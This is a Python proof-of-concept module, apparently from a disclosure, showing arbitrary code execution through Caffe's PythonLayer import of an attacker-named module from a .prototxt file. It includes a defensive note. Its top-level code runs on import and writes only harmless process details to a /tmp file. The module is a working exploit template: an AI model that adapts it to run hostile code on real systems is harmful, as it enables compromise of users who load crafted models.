"""
PoC: Caffe PythonLayer Arbitrary Code Execution
================================================
Caffe imports this module when a .prototxt specifies a Python layer with
module="evil_layer". The module's top-level code executes immediately on import.

Vulnerability: layer_factory.cpp:295
    bp::import(param.python_param().module().c_str())

This call hands Python's import mechanism a module name taken from the
.prototxt file, which the attacker controls. There is no sanitization, no
allowlist, and no sandboxing.

Defensive note: a .prototxt from an untrusted source has to be handled as
executable code, not as data. In upstream Caffe this code path is compiled only
when the build enables WITH_PYTHON_LAYER, so builds that do not need Python
layers can leave it disabled.
"""
import os
import sys
# PoC marker: record harmless process details to show that this module's
# top-level code ran at import time. The file write and the print below are the
# only side effects of this section.
# NOTE(review): the marker path is a fixed name in /tmp and open(..., "w")
# follows symlinks and truncates the target, so run this only in a disposable
# container or VM, never on a shared host.
proof_file = "/tmp/caffe_rce_proof.txt"
with open(proof_file, "w") as f:
    # The entries are evaluated after the file is opened, in the order they
    # are written, one line per fact.
    f.writelines(
        (
            f"Caffe PythonLayer RCE triggered!\n",
            f"PID: {os.getpid()}\n",
            f"UID: {os.getuid()}\n",
            f"CWD: {os.getcwd()}\n",
            f"Python: {sys.executable}\n",
            f"User: {os.environ.get('USER', 'unknown')}\n",
        )
    )
print(f"[PoC] Code executed! Proof written to {proof_file}")
# The PoC also has to define a valid PythonLayer class; without one, Caffe
# crashes after the import (by which point the top-level code has already run).
# In a real attack, the import alone is enough for the attacker to get RCE.
import caffe
class ExploitLayer(caffe.Layer):
    """Placeholder layer that gives Caffe a usable PythonLayer class after import.

    Every hook does the minimum: the first top blob is shaped to a single
    element and filled with zero, and no gradient is computed.
    """

    def setup(self, bottom, top):
        """Shape the first top blob to one element; ``bottom`` is not read."""
        top[0].reshape(1)

    def reshape(self, bottom, top):
        """Shape the first top blob to one element, exactly as ``setup`` does."""
        top[0].reshape(1)

    def forward(self, bottom, top):
        """Fill the data of the first top blob with zero."""
        top[0].data[...] = 0

    def backward(self, top, propagate_down, bottom):
        """Do nothing; this placeholder computes no gradient."""